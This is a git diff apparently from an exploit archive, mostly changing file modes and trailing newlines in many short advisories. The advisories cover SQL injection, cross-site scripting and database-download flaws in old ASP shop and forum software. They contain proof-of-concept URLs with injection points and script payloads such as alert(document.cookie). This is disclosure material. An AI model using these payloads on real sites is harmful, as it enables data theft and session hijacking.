http://www.example.com/owSearch/DisplayResults.asp?sIDSearch=15"> -http://www.example.com/owSearch/DisplayResults.asp?sIDSearch=1">

lalala

\ No newline at end of file +http://www.example.com/owSearch/DisplayResults.asp?sIDSearch=1">

lalala

\ No newline at end of file diff --git a/platforms/asp/webapps/25466.txt b/platforms/asp/webapps/25466.txt old mode 100755 new mode 100644 index 79a2298b6..1cc0d3840 --- a/platforms/asp/webapps/25466.txt +++ b/platforms/asp/webapps/25466.txt @@ -5,4 +5,4 @@ EcommProV3 is prone to an SQL injection vulnerability. This issue is due to a fa Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/scart/admin/login.asp?AdminID=admin&AdminPWD='[SQL Injection] -http://www.example.com/scart/admin/login.asp?AdminID=admin&AdminPWD=''='[SQL Injection] \ No newline at end of file +http://www.example.com/scart/admin/login.asp?AdminID=admin&AdminPWD=''='[SQL Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/25476.txt b/platforms/asp/webapps/25476.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25477.txt b/platforms/asp/webapps/25477.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25478.txt b/platforms/asp/webapps/25478.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25479.txt b/platforms/asp/webapps/25479.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25480.txt b/platforms/asp/webapps/25480.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25481.txt b/platforms/asp/webapps/25481.txt old mode 100755 new mode 100644 index e5f385e77..ec0146ca4 --- a/platforms/asp/webapps/25481.txt +++ b/platforms/asp/webapps/25481.txt @@ -135,4 +135,4 @@ http://www.example.com/dUpro/home/../News/detail.asp?iData=21&iCat='SQL_ERR http://www.example.com/dUpro/home/../news/detail.asp?iData=21&iCat='SQL_ERRORS&iChannel=1&nChannel=News http://www.example.com/dUpro/home/../Products/detail.asp?iData=9&iCat='SQL_ERRORS&iChannel=8&nChannel=Products http://www.example.com/dUpro/home/../Topics/detail.asp?iData=29&iCat=478&iChannel=16&nChannel='SQL_ERRORS -http://www.example.com/dUpro/Topics/../topics/detail.asp?iData=28&iCat=479&iChannel=16&nChannel='SQL_ERRORS \ No newline at end of file +http://www.example.com/dUpro/Topics/../topics/detail.asp?iData=28&iCat=479&iChannel=16&nChannel='SQL_ERRORS \ No newline at end of file diff --git a/platforms/asp/webapps/25482.txt b/platforms/asp/webapps/25482.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25483.txt b/platforms/asp/webapps/25483.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25484.txt b/platforms/asp/webapps/25484.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25485.txt b/platforms/asp/webapps/25485.txt old mode 100755 new mode 100644 index 3e874b434..be37ad508 --- a/platforms/asp/webapps/25485.txt +++ b/platforms/asp/webapps/25485.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos These vulnerabilities are reported to affect DUportal/DUportal SQL 3.1.2; earlier versions may also be affected. -http://www.example.com/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products \ No newline at end of file +http://www.example.com/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products \ No newline at end of file diff --git a/platforms/asp/webapps/25498.txt b/platforms/asp/webapps/25498.txt old mode 100755 new mode 100644 index 8bc99aaf5..35d0d5c27 --- a/platforms/asp/webapps/25498.txt +++ b/platforms/asp/webapps/25498.txt @@ -4,4 +4,4 @@ ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/module/support/task/comments.asp?taskid='[SQL_INJECTION] \ No newline at end of file +http://www.example.com/module/support/task/comments.asp?taskid='[SQL_INJECTION] \ No newline at end of file diff --git a/platforms/asp/webapps/25500.txt b/platforms/asp/webapps/25500.txt old mode 100755 new mode 100644 index 92ffbc78b..19da74161 --- a/platforms/asp/webapps/25500.txt +++ b/platforms/asp/webapps/25500.txt @@ -4,4 +4,4 @@ ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/module/support/task/detail.asp?taskid='[SQL_INJECTION] \ No newline at end of file +http://www.example.com/module/support/task/detail.asp?taskid='[SQL_INJECTION] \ No newline at end of file diff --git a/platforms/asp/webapps/25501.txt b/platforms/asp/webapps/25501.txt old mode 100755 new mode 100644 index 5ca58134d..80d9425c7 --- a/platforms/asp/webapps/25501.txt +++ b/platforms/asp/webapps/25501.txt @@ -4,4 +4,4 @@ ASPNuke is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/25502.txt b/platforms/asp/webapps/25502.txt old mode 100755 new mode 100644 index 8e75df6ea..0b88142c0 --- a/platforms/asp/webapps/25502.txt +++ b/platforms/asp/webapps/25502.txt @@ -4,4 +4,4 @@ ASPNuke is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/25504.txt b/platforms/asp/webapps/25504.txt old mode 100755 new mode 100644 index c99267b94..b0889f6b4 --- a/platforms/asp/webapps/25504.txt +++ b/platforms/asp/webapps/25504.txt @@ -4,4 +4,4 @@ Black Knight Forum is prone to an SQL injection vulnerability. This issue is due Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/member.asp?id=[SQL] \ No newline at end of file +http://www.example.com/member.asp?id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/25505.txt b/platforms/asp/webapps/25505.txt old mode 100755 new mode 100644 index bc8b87ec1..4740a0b6a --- a/platforms/asp/webapps/25505.txt +++ b/platforms/asp/webapps/25505.txt @@ -4,4 +4,4 @@ Black Knight Forum is prone to an SQL injection vulnerability. This issue is due Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/forum.asp?forum=[SQL] \ No newline at end of file +http://www.example.com/forum.asp?forum=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/25506.txt b/platforms/asp/webapps/25506.txt old mode 100755 new mode 100644 index 85c42aa2c..44ed295eb --- a/platforms/asp/webapps/25506.txt +++ b/platforms/asp/webapps/25506.txt @@ -4,4 +4,4 @@ CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/store/addToCart.asp?idProduct=[SQL]&quantity=1 \ No newline at end of file +http://www.example.com/store/addToCart.asp?idProduct=[SQL]&quantity=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25507.txt b/platforms/asp/webapps/25507.txt old mode 100755 new mode 100644 index bd78cd0b9..5cdff5eb0 --- a/platforms/asp/webapps/25507.txt +++ b/platforms/asp/webapps/25507.txt @@ -4,4 +4,4 @@ CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/store/productCatalogSubCats.asp?idParentCategory=[SQL] \ No newline at end of file +http://www.example.com/store/productCatalogSubCats.asp?idParentCategory=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/25508.txt b/platforms/asp/webapps/25508.txt old mode 100755 new mode 100644 index d7754798d..4f58f8ea2 --- a/platforms/asp/webapps/25508.txt +++ b/platforms/asp/webapps/25508.txt @@ -4,4 +4,4 @@ CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/store/productDetails.asp?idProduct=[SQL] \ No newline at end of file +http://www.example.com/store/productDetails.asp?idProduct=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/25509.txt b/platforms/asp/webapps/25509.txt old mode 100755 new mode 100644 index 47caad8bd..6f52725e0 --- a/platforms/asp/webapps/25509.txt +++ b/platforms/asp/webapps/25509.txt @@ -4,4 +4,4 @@ CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo=[SQL]&validate=1 \ No newline at end of file +http://www.example.com/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo=[SQL]&validate=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25510.txt b/platforms/asp/webapps/25510.txt old mode 100755 new mode 100644 index 28af66753..2f4af8343 --- a/platforms/asp/webapps/25510.txt +++ b/platforms/asp/webapps/25510.txt @@ -4,4 +4,4 @@ CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=[SQL]&priceTo=9999999999&validate=1 \ No newline at end of file +http://www.example.com/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=[SQL]&priceTo=9999999999&validate=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25511.txt b/platforms/asp/webapps/25511.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25512.txt b/platforms/asp/webapps/25512.txt old mode 100755 new mode 100644 index bfbd23f5a..1f933b7ab --- a/platforms/asp/webapps/25512.txt +++ b/platforms/asp/webapps/25512.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/tellAFriend.asp?idProduct='"> \ No newline at end of file +http://www.example.com/store/tellAFriend.asp?idProduct='"> \ No newline at end of file diff --git a/platforms/asp/webapps/25513.txt b/platforms/asp/webapps/25513.txt old mode 100755 new mode 100644 index fc987927a..e12f96015 --- a/platforms/asp/webapps/25513.txt +++ b/platforms/asp/webapps/25513.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/addToWishlist.asp?idProduct='"> \ No newline at end of file +http://www.example.com/store/addToWishlist.asp?idProduct='"> \ No newline at end of file diff --git a/platforms/asp/webapps/25514.txt b/platforms/asp/webapps/25514.txt old mode 100755 new mode 100644 index 1c380979f..cdf6516f8 --- a/platforms/asp/webapps/25514.txt +++ b/platforms/asp/webapps/25514.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/access.asp?redirect='"> \ No newline at end of file +http://www.example.com/store/access.asp?redirect='"> \ No newline at end of file diff --git a/platforms/asp/webapps/25515.txt b/platforms/asp/webapps/25515.txt old mode 100755 new mode 100644 index adcb9bea2..4d7821eaf --- a/platforms/asp/webapps/25515.txt +++ b/platforms/asp/webapps/25515.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/error.asp?message='"> \ No newline at end of file +http://www.example.com/store/error.asp?message='"> \ No newline at end of file diff --git a/platforms/asp/webapps/25516.txt b/platforms/asp/webapps/25516.txt old mode 100755 new mode 100644 index cb73e9958..08e5a5ab4 --- a/platforms/asp/webapps/25516.txt +++ b/platforms/asp/webapps/25516.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"> \ No newline at end of file +http://www.example.com/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"> \ No newline at end of file diff --git a/platforms/asp/webapps/25520.txt b/platforms/asp/webapps/25520.txt old mode 100755 new mode 100644 index 269586ad8..ccedca4be --- a/platforms/asp/webapps/25520.txt +++ b/platforms/asp/webapps/25520.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/login.asp?message='">&redirect= \ No newline at end of file +http://www.example.com/store/login.asp?message='">&redirect= \ No newline at end of file diff --git a/platforms/asp/webapps/25521.txt b/platforms/asp/webapps/25521.txt old mode 100755 new mode 100644 index c127c3b09..ed4ded5c9 --- a/platforms/asp/webapps/25521.txt +++ b/platforms/asp/webapps/25521.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1 \ No newline at end of file +http://www.example.com/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25522.txt b/platforms/asp/webapps/25522.txt old mode 100755 new mode 100644 index e9e9d1adb..ccdac48cd --- a/platforms/asp/webapps/25522.txt +++ b/platforms/asp/webapps/25522.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/searchResults.asp?name='">&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1 \ No newline at end of file +http://www.example.com/store/searchResults.asp?name='">&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25529.txt b/platforms/asp/webapps/25529.txt old mode 100755 new mode 100644 index 95562be87..5e6ed44d7 --- a/platforms/asp/webapps/25529.txt +++ b/platforms/asp/webapps/25529.txt @@ -10,4 +10,4 @@ http://www.example.com/default.asp?opr=35&id=1&idcategory='[SQL injection]&idcat http://www.example.com/default.asp?opr=35&id=1&idcategory=1&idcategoryp='[SQL injection] http://www.example.com/default.asp?mnu=&id=1&opr=5&content='[SQL injection] http://www.example.com/default.asp?id=1&opr=4&keyword='[SQL injection] -http://www.example.com/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='[SQL injection] \ No newline at end of file +http://www.example.com/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='[SQL injection] \ No newline at end of file diff --git a/platforms/asp/webapps/25530.txt b/platforms/asp/webapps/25530.txt old mode 100755 new mode 100644 index da64c9cb7..8c5fbcc14 --- a/platforms/asp/webapps/25530.txt +++ b/platforms/asp/webapps/25530.txt @@ -7,4 +7,4 @@ Exploitation of this vulnerability would expose the customer names, as they appe http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1 http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2 http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3 -http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder= \ No newline at end of file +http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder= \ No newline at end of file diff --git a/platforms/asp/webapps/25536.txt b/platforms/asp/webapps/25536.txt old mode 100755 new mode 100644 index 7c52494f3..352d18f5a --- a/platforms/asp/webapps/25536.txt +++ b/platforms/asp/webapps/25536.txt @@ -7,4 +7,4 @@ An attacker may exploit this issue to manipulate SQL queries to the underlying d http://www.example.com/eshopv-8/product.asp?intProdID='SQL_INJECTION&%3bstrCatalog_NAME=&%3bstrSubCatalog_NAME=&%3bstrSubCatalogID=&%3bintCatalogID=10001&%3bCurCatalogID= http://www.example.com/mcart2pfp/product.asp?intProdID='SQL_INJECTION http://www.example.com/mcart2sqluk/product.asp?intProdID='SQL_INJECTION -http://www.example.com/mcart2pal/product.asp?intProdID='SQL_INJECTION \ No newline at end of file +http://www.example.com/mcart2pal/product.asp?intProdID='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25537.txt b/platforms/asp/webapps/25537.txt old mode 100755 new mode 100644 index 08b1ba63a..899426599 --- a/platforms/asp/webapps/25537.txt +++ b/platforms/asp/webapps/25537.txt @@ -5,4 +5,4 @@ An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption. http://www.example.com/eshopv-8/productsByCategory.asp?intCatalogID=&%3bpage=2&%3bstrCatalog_NAME='SQL_INJECTION -http://www.example.com/mcart2pal/productsByCategory.asp?intCatalogID=&%3bpage=2&%3bstrCatalog_NAME='SQL_INJECTION \ No newline at end of file +http://www.example.com/mcart2pal/productsByCategory.asp?intCatalogID=&%3bpage=2&%3bstrCatalog_NAME='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25539.txt b/platforms/asp/webapps/25539.txt old mode 100755 new mode 100644 index 06c9ede78..a84cd6964 --- a/platforms/asp/webapps/25539.txt +++ b/platforms/asp/webapps/25539.txt @@ -8,4 +8,4 @@ MetaCart2 is vulnerable; other versions may also be affected. http://www.example.com/mcart2pfp/productsByCategory.asp?intCatalogID='SQL_INJECTION&%3bstrCatalog_NAME=Computers http://www.example.com/mcart2pal/productsByCategory.asp?intCatalogID=%27SQL_INJECTION&%3bstrCatalog_NAME=Computers -http://www.example.com/mcart2sqluk/productsByCategory.asp?intCatalogID='SQL_INJECTION&%3bpage=2 \ No newline at end of file +http://www.example.com/mcart2sqluk/productsByCategory.asp?intCatalogID='SQL_INJECTION&%3bpage=2 \ No newline at end of file diff --git a/platforms/asp/webapps/25540.txt b/platforms/asp/webapps/25540.txt old mode 100755 new mode 100644 index 0821adad5..81f590d93 --- a/platforms/asp/webapps/25540.txt +++ b/platforms/asp/webapps/25540.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to manipulate SQL queries to the underlying d http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID='SQL_INJECTION&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME=Laptops http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=%27SQL_INJECTION&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME=Laptops -http://www.example.com/mcart2sqluk/productsByCategory.asp?strSubCatalogID='SQL_INJECTION \ No newline at end of file +http://www.example.com/mcart2sqluk/productsByCategory.asp?strSubCatalogID='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25541.txt b/platforms/asp/webapps/25541.txt old mode 100755 new mode 100644 index f675a8b18..1d2a06181 --- a/platforms/asp/webapps/25541.txt +++ b/platforms/asp/webapps/25541.txt @@ -5,4 +5,4 @@ A remote SQL injection vulnerability affects MetaCart2. This issue is due to a f An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption. http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID='SQL_INJECTION&%3bstrSubCatalog_NAME=Laptops -http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=%27SQL_INJECTION&%3bstrSubCatalog_NAME=Laptops \ No newline at end of file +http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=%27SQL_INJECTION&%3bstrSubCatalog_NAME=Laptops \ No newline at end of file diff --git a/platforms/asp/webapps/25542.txt b/platforms/asp/webapps/25542.txt old mode 100755 new mode 100644 index f54717d7d..b04ed60bd --- a/platforms/asp/webapps/25542.txt +++ b/platforms/asp/webapps/25542.txt @@ -5,4 +5,4 @@ A remote SQL injection vulnerability affects MetaCart2. This issue is due to a f An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption. http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME='SQL_INJECTION -http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME='SQL_INJECTION \ No newline at end of file +http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25543.txt b/platforms/asp/webapps/25543.txt old mode 100755 new mode 100644 index f94d744e4..b8a2aa3fd --- a/platforms/asp/webapps/25543.txt +++ b/platforms/asp/webapps/25543.txt @@ -9,4 +9,4 @@ http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText='SQL_INJ http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice='SQL_INJECTION&intPrice=all&chkCat=yes&strCat=1 http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice='SQL_INJECTION&chkCat=yes&strCat=1 http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat='SQL_INJECTION&strCat=1 -http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat='SQL_INJECTION \ No newline at end of file +http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25544.txt b/platforms/asp/webapps/25544.txt old mode 100755 new mode 100644 index 3471bbd38..3ae2d65f3 --- a/platforms/asp/webapps/25544.txt +++ b/platforms/asp/webapps/25544.txt @@ -4,4 +4,4 @@ A remote SQL injection vulnerability affects MetaBid Auctions. This issue is due An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate the theft of sensitive information, potentially including authentication credentials, and data corruption. -http://example.com/metabid/item.asp?intAuctionID='SQL_INJECTION \ No newline at end of file +http://example.com/metabid/item.asp?intAuctionID='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25585.txt b/platforms/asp/webapps/25585.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25586.txt b/platforms/asp/webapps/25586.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25587.txt b/platforms/asp/webapps/25587.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25588.txt b/platforms/asp/webapps/25588.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25589.txt b/platforms/asp/webapps/25589.txt old mode 100755 new mode 100644 index 298fd19cb..15dfba4b7 --- a/platforms/asp/webapps/25589.txt +++ b/platforms/asp/webapps/25589.txt @@ -5,4 +5,4 @@ MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. T Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. custom_link.asp?method=Topic&TOPIC_ID=[Sql inject] -custom_link.asp?method=Forum&Forum_ID=[Sql inject] \ No newline at end of file +custom_link.asp?method=Forum&Forum_ID=[Sql inject] \ No newline at end of file diff --git a/platforms/asp/webapps/25595.txt b/platforms/asp/webapps/25595.txt old mode 100755 new mode 100644 index c082dbdf6..7371d73bc --- a/platforms/asp/webapps/25595.txt +++ b/platforms/asp/webapps/25595.txt @@ -4,4 +4,4 @@ ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This i Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/Calendar/defer.asp?Event_ID='&Occurr_ID=0 \ No newline at end of file +http://www.example.com/Calendar/defer.asp?Event_ID='&Occurr_ID=0 \ No newline at end of file diff --git a/platforms/asp/webapps/25596.txt b/platforms/asp/webapps/25596.txt old mode 100755 new mode 100644 index ce750500b..7ac512b2a --- a/platforms/asp/webapps/25596.txt +++ b/platforms/asp/webapps/25596.txt @@ -4,4 +4,4 @@ ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This i Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/Calendar/details.asp?Event_ID=' \ No newline at end of file +http://www.example.com/Calendar/details.asp?Event_ID=' \ No newline at end of file diff --git a/platforms/asp/webapps/25651.txt b/platforms/asp/webapps/25651.txt old mode 100755 new mode 100644 index c094de929..7cb0f2c44 --- a/platforms/asp/webapps/25651.txt +++ b/platforms/asp/webapps/25651.txt @@ -12,4 +12,4 @@ Cross-site Scripting /post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="> HTML Injection: -/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext> \ No newline at end of file +/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext> \ No newline at end of file diff --git a/platforms/asp/webapps/25661.txt b/platforms/asp/webapps/25661.txt old mode 100755 new mode 100644 index 7e099726a..e5ccc3e53 --- a/platforms/asp/webapps/25661.txt +++ b/platforms/asp/webapps/25661.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13630/info Keyvan1 ImageGallery is prone to an access validation vulnerability that could allow the underlying database to be downloaded. -http://www.example.com/[path]/image.mdb \ No newline at end of file +http://www.example.com/[path]/image.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/25667.txt b/platforms/asp/webapps/25667.txt old mode 100755 new mode 100644 index 001a96008..2c8b9640b --- a/platforms/asp/webapps/25667.txt +++ b/platforms/asp/webapps/25667.txt @@ -4,4 +4,4 @@ MetaCart e-Shop is prone to a cross-site scripting vulnerability. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/mcartlite/productsByCategory.asp?intCatalogID=1&strCatalog_NAME=<script>alert('test')</script> \ No newline at end of file +http://www.example.com/mcartlite/productsByCategory.asp?intCatalogID=1&strCatalog_NAME=<script>alert('test')</script> \ No newline at end of file diff --git a/platforms/asp/webapps/25700.txt b/platforms/asp/webapps/25700.txt old mode 100755 new mode 100644 index 319eca500..602c379cb --- a/platforms/asp/webapps/25700.txt +++ b/platforms/asp/webapps/25700.txt @@ -23,4 +23,4 @@ http://www.example.com/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bible http://www.example.com/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4 http://www.example.com/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script> http://www.example.com/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE] -http://www.example.com/store/Login.asp?RedirectURL=[XSS-code] \ No newline at end of file +http://www.example.com/store/Login.asp?RedirectURL=[XSS-code] \ No newline at end of file diff --git a/platforms/asp/webapps/25701.txt b/platforms/asp/webapps/25701.txt old mode 100755 new mode 100644 index 924b0f965..e3df5e09c --- a/platforms/asp/webapps/25701.txt +++ b/platforms/asp/webapps/25701.txt @@ -12,4 +12,4 @@ http://www.example.com/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=56 http://www.example.com/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION] http://www.example.com/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION] http://www.example.com/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles -http://www.example.com/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4 \ No newline at end of file +http://www.example.com/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4 \ No newline at end of file diff --git a/platforms/asp/webapps/25705.txt b/platforms/asp/webapps/25705.txt old mode 100755 new mode 100644 index 